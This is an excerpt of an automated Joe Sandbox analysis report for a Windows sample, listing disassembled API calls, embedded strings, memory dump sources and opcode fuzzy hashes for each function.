                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1153243558-438819550
                                                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicoll
                                                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                        • API String ID: 3832890014-4202584635
                                                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$CtrlFocus
                                                                                        • String ID: 0
                                                                                        • API String ID: 1534620443-4108050209
                                                                                        • Opcode ID: 19fc4ca06a55c5ef94493fcc7b8246f99668ff01b4712dff56d0fdc7fbc3c8ab
                                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                        • Opcode Fuzzy Hash: 19fc4ca06a55c5ef94493fcc7b8246f99668ff01b4712dff56d0fdc7fbc3c8ab
                                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateDestroy
                                                                                        • String ID: ,$tooltips_class32
                                                                                        • API String ID: 1109047481-3856767331
                                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                        • String ID: 0
                                                                                        • API String ID: 1441871840-4108050209
                                                                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 3631882475-2268648507
                                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                        APIs
                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                        • SendMessageW.USER32 ref: 00471740
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                        • String ID:
                                                                                        • API String ID: 4116747274-0
                                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                        • _wcslen.LIBCMT ref: 00461683
                                                                                        • __swprintf.LIBCMT ref: 00461721
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                        • GetParent.USER32(?), ref: 004618C3
                                                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 1899580136-679674701
                                                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu$Sleep
                                                                                        • String ID: 0
                                                                                        • API String ID: 1196289194-4108050209
                                                                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 3300687185-3887548279
                                                                                        • Opcode ID: 1fe97bc8bf9d8eaeb3297d274ead1acc1ba6092dc26e665571dd5f65587823ec
                                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                        • Opcode Fuzzy Hash: 1fe97bc8bf9d8eaeb3297d274ead1acc1ba6092dc26e665571dd5f65587823ec
                                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1976180769-4113822522
                                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                        • String ID:
                                                                                        • API String ID: 461458858-0
                                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
